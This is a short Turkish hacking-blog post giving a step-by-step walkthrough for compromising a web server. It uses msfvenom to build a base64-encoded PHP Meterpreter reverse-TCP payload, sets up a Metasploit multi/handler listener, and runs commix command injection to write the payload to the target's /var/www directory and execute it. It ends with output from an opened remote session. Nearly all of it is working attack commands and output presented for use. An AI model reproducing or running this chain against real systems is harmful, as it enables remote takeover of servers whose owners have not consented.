// Posted by :ROOTAYYILDIZ

Adım 1: Meterpreter ile PHP shell oluşturmak ;


Kod:
msfvenom -p php/meterpreter/reverse_tcp LHOST=İP_ADRESİNİZ  LPORT=4444 -e php/base64 -f raw > /root/Desktop/msfvenom.php

Adım 2: msfconsole ile Multi Handleri Başlatıyoruz ;

Kod:
msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.178.3
LHOST => 192.168.178.3
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.178.3:4444
[*] Starting the payload handler...

3. Adım: Hedefin "/ var / www /" dizinindeki "msfvenom.php" dosyasını oluşturmak ve uygulamak için commix-i kullanın.
Kod:
https://github.com/commixproject/commix

Kod:
root@kali:~/commix# python commix.py --url="http://192.168.178.4/cmd/normal.php?addr=INJECT_HERE" --file-write="/root/Desktop/msfvenom.php" --file-dest="/var/www/msfvenom.php" --os-cmd="php -f /var/www/msfvenom.php"

SHELL ATILMIŞTIR !

Kod:
[*] Sending stage (40499 bytes) to 192.168.178.4
[*] Meterpreter session 1 opened (192.168.178.3:4444 -> 192.168.178.4:50450) at 2015-05-16 03:11:42 -0400

meterpreter > sysinfo
Computer    : debian
OS          : Linux debian 3.16.0-4-586 #1 Debian 3.16.7-ckt9-3~deb8u1 (2015-04-24) i686
Meterpreter : php/php
meterpreter >

Leave a Reply

Subscribe to Posts | Subscribe to Comments

[ root ⚔ αyyιldιz ]